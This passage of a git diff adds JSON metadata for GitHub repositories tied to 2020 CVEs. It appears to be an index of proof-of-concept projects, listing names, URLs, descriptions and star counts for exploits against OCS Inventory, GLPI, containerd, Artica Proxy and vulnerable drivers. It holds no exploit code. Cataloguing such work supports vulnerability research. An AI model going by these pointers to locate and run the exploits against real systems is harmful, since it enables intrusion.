"forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14947.json b/2020/CVE-2020-14947.json new file mode 100644 index 0000000000..fbd8dcd28b --- /dev/null +++ b/2020/CVE-2020-14947.json @@ -0,0 +1,33 @@ +[ + { + "id": 276697965, + "name": "CVE-2020-14947", + "full_name": "mhaskar\/CVE-2020-14947", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2020-14947", + "description": "The official exploit for OCS Inventory NG v2.7 Remote Command Execution CVE-2020-14947", + "fork": false, + "created_at": "2020-07-02T16:40:52Z", + "updated_at": "2022-09-17T19:26:58Z", + "pushed_at": "2020-07-02T16:46:10Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 19, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14955.json b/2020/CVE-2020-14955.json new file mode 100644 index 0000000000..ce3eb235bb --- /dev/null +++ b/2020/CVE-2020-14955.json @@ -0,0 +1,33 @@ +[ + { + "id": 302371253, + "name": "CVE-2020-14955", + "full_name": "intrigus-lgtm\/CVE-2020-14955", + "owner": { + "login": "intrigus-lgtm", + "id": 60750685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60750685?v=4", + "html_url": "https:\/\/github.com\/intrigus-lgtm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/intrigus-lgtm\/CVE-2020-14955", + "description": "Jiangmin", + "fork": false, + "created_at": "2020-10-08T14:41:23Z", + "updated_at": "2020-10-10T08:24:37Z", + "pushed_at": "2020-10-09T03:46:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14965.json b/2020/CVE-2020-14965.json new file mode 100644 index 0000000000..43e2bffc46 --- /dev/null +++ b/2020/CVE-2020-14965.json @@ -0,0 +1,33 @@ +[ + { + "id": 274279031, + "name": "CVE-2020-14965", + "full_name": "g-rubert\/CVE-2020-14965", + "owner": { + "login": "g-rubert", + "id": 40837605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40837605?v=4", + "html_url": "https:\/\/github.com\/g-rubert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-rubert\/CVE-2020-14965", + "description": "TP-LINK Multiple HTML Injection Vulnerabilities ", + "fork": false, + "created_at": "2020-06-23T01:23:26Z", + "updated_at": "2020-09-09T17:36:55Z", + "pushed_at": "2020-09-09T17:36:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14974.json b/2020/CVE-2020-14974.json new file mode 100644 index 0000000000..ccc9d13c65 --- /dev/null +++ b/2020/CVE-2020-14974.json @@ -0,0 +1,33 @@ +[ + { + "id": 786550724, + "name": "CVE-2020-14974", + "full_name": "Aterror2be\/CVE-2020-14974", + "owner": { + "login": "Aterror2be", + "id": 42120647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42120647?v=4", + "html_url": "https:\/\/github.com\/Aterror2be", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aterror2be\/CVE-2020-14974", + "description": "A simple POC that demonstrates A vulnerability found in IObitUnlocker 1.1.2 that leverages IOCTL codes found it its vulnerable driver (IObitUnlocker.sys), providing ability to unlock, delete, rename, copy, and move running files and a low privileged user.", + "fork": false, + "created_at": "2024-04-14T19:53:03Z", + "updated_at": "2024-11-15T10:53:51Z", + "pushed_at": "2024-04-14T20:07:14Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15002.json b/2020/CVE-2020-15002.json new file mode 100644 index 0000000000..52de255c12 --- /dev/null +++ b/2020/CVE-2020-15002.json @@ -0,0 +1,64 @@ +[ + { + "id": 321271734, + "name": "Blind-SSRF-CVE-2020-15002", + "full_name": "skr0x1c0\/Blind-SSRF-CVE-2020-15002", + "owner": { + "login": "skr0x1c0", + "id": 75971916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75971916?v=4", + "html_url": "https:\/\/github.com\/skr0x1c0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skr0x1c0\/Blind-SSRF-CVE-2020-15002", + "description": "https:\/\/hackerone.com\/reports\/865652", + "fork": false, + "created_at": "2020-12-14T07:48:44Z", + "updated_at": "2020-12-14T07:52:11Z", + "pushed_at": "2020-12-14T07:49:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 321272199, + "name": "SSRF-CVE-2020-15002", + "full_name": "skr0x1c0\/SSRF-CVE-2020-15002", + "owner": { + "login": "skr0x1c0", + "id": 75971916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75971916?v=4", + "html_url": "https:\/\/github.com\/skr0x1c0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skr0x1c0\/SSRF-CVE-2020-15002", + "description": "https:\/\/hackerone.com\/reports\/863553", + "fork": false, + "created_at": "2020-12-14T07:50:45Z", + "updated_at": "2020-12-14T07:57:57Z", + "pushed_at": "2020-12-14T07:56:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15051.json b/2020/CVE-2020-15051.json new file mode 100644 index 0000000000..e3006928bf --- /dev/null +++ b/2020/CVE-2020-15051.json @@ -0,0 +1,33 @@ +[ + { + "id": 277732389, + "name": "CVE-2020-15051", + "full_name": "pratikshad19\/CVE-2020-15051", + "owner": { + "login": "pratikshad19", + "id": 67833998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67833998?v=4", + "html_url": "https:\/\/github.com\/pratikshad19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pratikshad19\/CVE-2020-15051", + "description": "CVE-2020-15051 : Artica Proxy before 4.30.000000 Community Edition allows Stored Cross Site Scripting.", + "fork": false, + "created_at": "2020-07-07T06:11:04Z", + "updated_at": "2020-07-20T16:22:23Z", + "pushed_at": "2020-07-20T16:22:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15052.json b/2020/CVE-2020-15052.json new file mode 100644 index 0000000000..b83dfece97 --- /dev/null +++ b/2020/CVE-2020-15052.json @@ -0,0 +1,33 @@ +[ + { + "id": 277770540, + "name": "CVE-2020-15052", + "full_name": "pratikshad19\/CVE-2020-15052", + "owner": { + "login": "pratikshad19", + "id": 67833998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67833998?v=4", + "html_url": "https:\/\/github.com\/pratikshad19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pratikshad19\/CVE-2020-15052", + "description": "Artica Proxy before 4.30.000000 Community Edition allows SQL Injection.", + "fork": false, + "created_at": "2020-07-07T09:13:18Z", + "updated_at": "2020-07-21T13:24:54Z", + "pushed_at": "2020-07-20T16:21:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15053.json b/2020/CVE-2020-15053.json new file mode 100644 index 0000000000..5081fffc46 --- /dev/null +++ b/2020/CVE-2020-15053.json @@ -0,0 +1,33 @@ +[ + { + "id": 277772338, + "name": "CVE-2020-15053", + "full_name": "pratikshad19\/CVE-2020-15053", + "owner": { + "login": "pratikshad19", + "id": 67833998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67833998?v=4", + "html_url": "https:\/\/github.com\/pratikshad19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pratikshad19\/CVE-2020-15053", + "description": "Artica Proxy before 4.30.000000 Community Edition allows Reflected Cross Site Scripting.", + "fork": false, + "created_at": "2020-07-07T09:21:30Z", + "updated_at": "2020-07-20T16:21:09Z", + "pushed_at": "2020-07-20T16:21:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15148.json b/2020/CVE-2020-15148.json new file mode 100644 index 0000000000..eea366ee02 --- /dev/null +++ b/2020/CVE-2020-15148.json @@ -0,0 +1,64 @@ +[ + { + "id": 297223360, + "name": "CVE-2020-15148-bypasses", + "full_name": "Maskhe\/CVE-2020-15148-bypasses", + "owner": { + "login": "Maskhe", + "id": 30264078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30264078?v=4", + "html_url": "https:\/\/github.com\/Maskhe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maskhe\/CVE-2020-15148-bypasses", + "description": "几条关于CVE-2020-15148(yii2反序列化)的绕过", + "fork": false, + "created_at": "2020-09-21T03:55:55Z", + "updated_at": "2024-08-12T20:06:00Z", + "pushed_at": "2020-09-21T04:04:39Z", + "stargazers_count": 76, + "watchers_count": 76, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 76, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 307620612, + "name": "cve-2020-15148", + "full_name": "0xkami\/cve-2020-15148", + "owner": { + "login": "0xkami", + "id": 19571618, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19571618?v=4", + "html_url": "https:\/\/github.com\/0xkami", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkami\/cve-2020-15148", + "description": "cve-2020-15148", + "fork": false, + "created_at": "2020-10-27T07:33:47Z", + "updated_at": "2021-12-15T07:57:25Z", + "pushed_at": "2020-10-27T07:35:04Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15169.json b/2020/CVE-2020-15169.json new file mode 100644 index 0000000000..d0040cb6ec --- /dev/null +++ b/2020/CVE-2020-15169.json @@ -0,0 +1,33 @@ +[ + { + "id": 302388307, + "name": "CVE-2020-15169", + "full_name": "glasses618\/CVE-2020-15169", + "owner": { + "login": "glasses618", + "id": 10650655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10650655?v=4", + "html_url": "https:\/\/github.com\/glasses618", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/glasses618\/CVE-2020-15169", + "description": null, + "fork": false, + "created_at": "2020-10-08T15:42:37Z", + "updated_at": "2020-10-08T15:43:15Z", + "pushed_at": "2020-10-08T15:43:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15175.json b/2020/CVE-2020-15175.json new file mode 100644 index 0000000000..110419e95c --- /dev/null +++ b/2020/CVE-2020-15175.json @@ -0,0 +1,33 @@ +[ + { + "id": 469754171, + "name": "GLPwn", + "full_name": "Xn2\/GLPwn", + "owner": { + "login": "Xn2", + "id": 19215931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19215931?v=4", + "html_url": "https:\/\/github.com\/Xn2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xn2\/GLPwn", + "description": "GLPI automatic exploitation tool for CVE-2020-15175", + "fork": false, + "created_at": "2022-03-14T13:51:17Z", + "updated_at": "2024-01-22T07:44:44Z", + "pushed_at": "2022-06-20T11:05:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15227.json b/2020/CVE-2020-15227.json new file mode 100644 index 0000000000..268a25cef7 --- /dev/null +++ b/2020/CVE-2020-15227.json @@ -0,0 +1,102 @@ +[ + { + "id": 302645381, + "name": "CVE-2020-15227", + "full_name": "Langriklol\/CVE-2020-15227", + "owner": { + "login": "Langriklol", + "id": 20239181, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20239181?v=4", + "html_url": "https:\/\/github.com\/Langriklol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Langriklol\/CVE-2020-15227", + "description": "CVE-2020-15227 exploit", + "fork": false, + "created_at": "2020-10-09T13:13:14Z", + "updated_at": "2020-11-08T21:38:22Z", + "pushed_at": "2020-11-05T21:29:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "rce", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 302798857, + "name": "CVE-2020-15227", + "full_name": "hu4wufu\/CVE-2020-15227", + "owner": { + "login": "hu4wufu", + "id": 22029831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22029831?v=4", + "html_url": "https:\/\/github.com\/hu4wufu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hu4wufu\/CVE-2020-15227", + "description": "CVE-2020-15227 exploit", + "fork": false, + "created_at": "2020-10-10T02:38:15Z", + "updated_at": "2023-05-27T10:15:48Z", + "pushed_at": "2020-10-09T16:39:54Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 313061696, + "name": "CVE-2020-15227", + "full_name": "filipsedivy\/CVE-2020-15227", + "owner": { + "login": "filipsedivy", + "id": 5647591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5647591?v=4", + "html_url": "https:\/\/github.com\/filipsedivy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/filipsedivy\/CVE-2020-15227", + "description": "CVE-2020-15227 checker", + "fork": false, + "created_at": "2020-11-15T15:30:01Z", + "updated_at": "2020-11-16T20:29:13Z", + "pushed_at": "2020-11-15T21:49:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15228.json b/2020/CVE-2020-15228.json new file mode 100644 index 0000000000..dbef44981d --- /dev/null +++ b/2020/CVE-2020-15228.json @@ -0,0 +1,33 @@ +[ + { + "id": 312263531, + "name": "fix-CVE-2020-15228", + "full_name": "guettli\/fix-CVE-2020-15228", + "owner": { + "login": "guettli", + "id": 414336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/414336?v=4", + "html_url": "https:\/\/github.com\/guettli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guettli\/fix-CVE-2020-15228", + "description": "Fix CVE-2020-15228 (set-env, add-path in Github-Actions)", + "fork": false, + "created_at": "2020-11-12T11:59:47Z", + "updated_at": "2024-05-21T09:39:11Z", + "pushed_at": "2020-11-16T10:31:51Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15257.json b/2020/CVE-2020-15257.json new file mode 100644 index 0000000000..6b5dc84ab3 --- /dev/null +++ b/2020/CVE-2020-15257.json @@ -0,0 +1,33 @@ +[ + { + "id": 319257203, + "name": "abstractshimmer", + "full_name": "nccgroup\/abstractshimmer", + "owner": { + "login": "nccgroup", + "id": 4067082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4067082?v=4", + "html_url": "https:\/\/github.com\/nccgroup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nccgroup\/abstractshimmer", + "description": "Proof of concept for CVE-2020-15257 in containerd.", + "fork": false, + "created_at": "2020-12-07T08:47:09Z", + "updated_at": "2024-09-23T19:19:16Z", + "pushed_at": "2021-01-12T09:46:50Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15261.json b/2020/CVE-2020-15261.json new file mode 100644 index 0000000000..2c00c92126 --- /dev/null +++ b/2020/CVE-2020-15261.json @@ -0,0 +1,33 @@ +[ + { + "id": 447164459, + "name": "CVE-2020-15261", + "full_name": "yaoyao-cool\/CVE-2020-15261", + "owner": { + "login": "yaoyao-cool", + "id": 61368305, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61368305?v=4", + "html_url": "https:\/\/github.com\/yaoyao-cool", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaoyao-cool\/CVE-2020-15261", + "description": "CVE-2020-15261 test", + "fork": false, + "created_at": "2022-01-12T10:00:39Z", + "updated_at": "2022-01-12T10:00:39Z", + "pushed_at": "2022-01-12T10:00:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15349.json b/2020/CVE-2020-15349.json new file mode 100644 index 0000000000..e1fcf7b19e --- /dev/null +++ b/2020/CVE-2020-15349.json @@ -0,0 +1,33 @@ +[ + { + "id": 312567868, + "name": "Forklift_LPE", + "full_name": "Traxes\/Forklift_LPE", + "owner": { + "login": "Traxes", + "id": 6783032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6783032?v=4", + "html_url": "https:\/\/github.com\/Traxes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Traxes\/Forklift_LPE", + "description": "Vulnerability Description of CVE-2020-15349", + "fork": false, + "created_at": "2020-11-13T12:20:07Z", + "updated_at": "2024-01-25T20:46:23Z", + "pushed_at": "2020-11-13T13:41:42Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15367.json b/2020/CVE-2020-15367.json new file mode 100644 index 0000000000..a6f26d21a6 --- /dev/null +++ b/2020/CVE-2020-15367.json @@ -0,0 +1,33 @@ +[ + { + "id": 276133222, + "name": "CVE-2020-15367", + "full_name": "inflixim4be\/CVE-2020-15367", + "owner": { + "login": "inflixim4be", + "id": 49153346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49153346?v=4", + "html_url": "https:\/\/github.com\/inflixim4be", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/inflixim4be\/CVE-2020-15367", + "description": "Brute Force on Supravizio BPM 10.1.2", + "fork": false, + "created_at": "2020-06-30T15:08:01Z", + "updated_at": "2020-07-23T22:14:29Z", + "pushed_at": "2020-07-23T22:14:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15368.json b/2020/CVE-2020-15368.json new file mode 100644 index 0000000000..e9b11aabc2 --- /dev/null +++ b/2020/CVE-2020-15368.json @@ -0,0 +1,69 @@ +[ + { + "id": 381240187, + "name": "CVE-2020-15368", + "full_name": "stong\/CVE-2020-15368", + "owner": { + "login": "stong", + "id": 14918218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14918218?v=4", + "html_url": "https:\/\/github.com\/stong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stong\/CVE-2020-15368", + "description": "CVE-2020-15368, aka \"How to exploit a vulnerable driver\"", + "fork": false, + "created_at": "2021-06-29T04:38:24Z", + "updated_at": "2024-11-15T12:23:01Z", + "pushed_at": "2022-04-14T03:17:44Z", + "stargazers_count": 440, + "watchers_count": 440, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "kernel", + "tutorial", + "windows" + ], + "visibility": "public", + "forks": 45, + "watchers": 440, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 840867565, + "name": "asrockploit", + "full_name": "R7flex\/asrockploit", + "owner": { + "login": "R7flex", + "id": 50244396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50244396?v=4", + "html_url": "https:\/\/github.com\/R7flex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R7flex\/asrockploit", + "description": "CVE-2020-15368 updated", + "fork": false, + "created_at": "2024-08-10T23:51:38Z", + "updated_at": "2024-10-12T08:25:16Z", + "pushed_at": "2024-10-12T08:25:12Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15392.json b/2020/CVE-2020-15392.json new file mode 100644 index 0000000000..5114231a91 --- /dev/null +++ b/2020/CVE-2020-15392.json @@ -0,0 +1,33 @@ +[ + { + "id": 276133013, + "name": "CVE-2020-15392", + "full_name": "inflixim4be\/CVE-2020-15392", + "owner": { + "login": "inflixim4be", + "id": 49153346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49153346?v=4", + "html_url": "https:\/\/github.com\/inflixim4be", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/inflixim4be\/CVE-2020-15392", + "description": "User Enumeration on Supravizio BPM 10.1.2", + "fork": false, + "created_at": "2020-06-30T15:07:12Z", + "updated_at": "2020-07-26T16:02:52Z", + "pushed_at": "2020-07-26T16:02:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15399.json b/2020/CVE-2020-15399.json new file mode 100644 index 0000000000..78b09c927a --- /dev/null +++ b/2020/CVE-2020-15399.json @@ -0,0 +1,33 @@ +[ + { + "id": 284479027, + "name": "CVE-2020-15399", + "full_name": "mkelepce\/CVE-2020-15399", + "owner": { + "login": "mkelepce", + "id": 10780392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10780392?v=4", + "html_url": "https:\/\/github.com\/mkelepce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mkelepce\/CVE-2020-15399", + "description": " Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection", + "fork": false, + "created_at": "2020-08-02T14:35:26Z", + "updated_at": "2020-08-02T14:38:26Z", + "pushed_at": "2020-08-02T14:38:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15416.json b/2020/CVE-2020-15416.json new file mode 100644 index 0000000000..140bf12ad4 --- /dev/null +++ b/2020/CVE-2020-15416.json @@ -0,0 +1,33 @@ +[ + { + "id": 302775759, + "name": "R7000_httpd_BOF_CVE-2020-15416", + "full_name": "k3vinlusec\/R7000_httpd_BOF_CVE-2020-15416", + "owner": { + "login": "k3vinlusec", + "id": 19988136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19988136?v=4", + "html_url": "https:\/\/github.com\/k3vinlusec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3vinlusec\/R7000_httpd_BOF_CVE-2020-15416", + "description": "https:\/\/www.zerodayinitiative.com\/advisories\/ZDI-20-712\/", + "fork": false, + "created_at": "2020-10-09T23:42:50Z", + "updated_at": "2023-05-23T04:56:03Z", + "pushed_at": "2021-07-23T20:54:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15436.json b/2020/CVE-2020-15436.json new file mode 100644 index 0000000000..6d74103758 --- /dev/null +++ b/2020/CVE-2020-15436.json @@ -0,0 +1,33 @@ +[ + { + "id": 684541518, + "name": "linux-4.19.72_CVE-2020-15436", + "full_name": "Trinadh465\/linux-4.19.72_CVE-2020-15436", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2020-15436", + "description": null, + "fork": false, + "created_at": "2023-08-29T10:53:27Z", + "updated_at": "2023-08-29T10:59:41Z", + "pushed_at": "2023-08-29T10:57:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15492.json b/2020/CVE-2020-15492.json new file mode 100644 index 0000000000..7109de1a60 --- /dev/null +++ b/2020/CVE-2020-15492.json @@ -0,0 +1,33 @@ +[ + { + "id": 298218272, + "name": "CVE-2020-15492", + "full_name": "patrickhener\/CVE-2020-15492", + "owner": { + "login": "patrickhener", + "id": 7579055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7579055?v=4", + "html_url": "https:\/\/github.com\/patrickhener", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patrickhener\/CVE-2020-15492", + "description": "This repository holds the advisory, exploits and vulnerable software of the CVE-2020-15492", + "fork": false, + "created_at": "2020-09-24T08:36:40Z", + "updated_at": "2020-09-29T13:45:47Z", + "pushed_at": "2020-09-29T13:45:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15568.json b/2020/CVE-2020-15568.json new file mode 100644 index 0000000000..915c78f907 --- /dev/null +++ b/2020/CVE-2020-15568.json @@ -0,0 +1,64 @@ +[ + { + "id": 555933085, + "name": "CVE-2020-15568", + "full_name": 